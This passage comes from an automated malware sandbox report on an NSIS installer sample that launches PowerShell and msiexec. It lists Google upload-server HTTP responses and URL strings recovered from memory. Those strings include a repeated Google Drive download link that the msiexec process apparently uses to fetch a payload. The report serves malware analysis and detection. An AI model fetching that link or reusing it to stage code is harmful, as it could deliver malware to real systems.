Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXFlVnoPoSoaCZ-VhZH5PwAqIYy_lP7f_v20RhS_3274oaGNg7tTJuaKpjFFADm82ekGnkdB0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:21 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-yC7SrjGQMhvCaO-BuhRaeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSuLBWxBTWhtvbIxAWEz9k7FZbtEm5xpnIgr5OiEYXUMVuEjAd-ebiuK0ZRb_JFPSPTzq_U_WgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:23 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qzHDhLanIGWPx8bo5cmBTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSzbweVsItyvRnOlAa8CiI5FknY2DRoQPYXDcfvQBgv4IASAsU1vtihTmM7GOieeP8w5CKujvgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-aEkAcqGmBg0qrqQl2A18bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgThZMaEJ6nhJpFG9cMRNKZxGdB6FPITtZVXbpkkfHD4Qjqjy4_Rfg7gJTTDAJW9dZiVpWhrgMsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:28 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-6KV-VokfnN3gCHt0jhNRrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSwCHat4uhEJ4UeKb7te0J71D_tJglQ3l5UHA3u8sHUWQkAMA6ZKrN7SkVrvj9pUPV-bKMn5uwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:30 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-BXAuri8N-g8MqamUDEvxiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQFFFDL6iJB0uVtmxZWg7YTE7svkqNKozszD9bYoTt0XDEejBki-lV6iUpzAzc4qpvZw7Y9NzIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:33 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-0uNW_C1Nd0rfJ8rGXqQaOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgScSgnFCF1bib7ImfpRNgOwgBA_lupFaR_qSHRPyDpoh6PHtxIYb7GYuZCIsTYF1oMhS7iwhI0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:09:35 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-8VAymmCHxvr6rv_SM2eBQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close

Source: powershell.exe, 00000002.00000002.2822656298.00000000077C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microU
Source: powershell.exe, 00000002.00000002.2822656298.0000000007758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.2822656298.00000000077C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft%
Source: ro7eoySJ9q.exe, 00000000.00000002.2248060069.000000000040A000.00000004.00000001.01000000.00000003.sdmp, ro7eoySJ9q.exe, 00000000.00000000.2146201166.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2816419859.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2816419859.0000000004FC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2816419859.0000000005116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2821029727.0000000006029000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=d
Source: msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378104355.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356523597.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/4v%
Source: msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/U
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/WVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
Source: msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/dv
Source: msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3065994854.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3206818397.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/e
Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077629793.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287266518.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3088968525.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334266801.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3077666094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/user
Source: msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3184302158.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/lifornia1
Source: msiexec.exe, 00000008.00000003.3253010225.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3264909388.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3252872564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/ny
Source: msiexec.exe, 00000008.00000003.3195852061.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=do
Source: msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3009836882.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/tv
Source: msiexec.exe, 00000008.00000003.3275713926.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3435942709.0000000024C50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B$q
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BRs
Source: msiexec.exe, 00000008.00000003.2988348442.0000000009A20000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2998104920.0000000009A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BX
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BZp
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_Blcck
Source: msiexec.exe, 00000008.00000002.3424004008.00000000099AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_Bpp
Source: msiexec.exe, 00000008.00000003.3043390717.00000000099FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_Bst
Source: msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3101436493.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_BygCjYRh_925Uq_B
Source: msiexec.exe, 00000008.00000003.3344924275.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3043324471.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3345075982.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3415424564.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3032314396.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3367235785.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3112558031.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3126066692.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3148742082.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3066077566.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321338094.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3356689700.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3334459298.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3299009797.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3287143818.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3321242531.0000000009A1B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.3378740232.0000000009A1F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 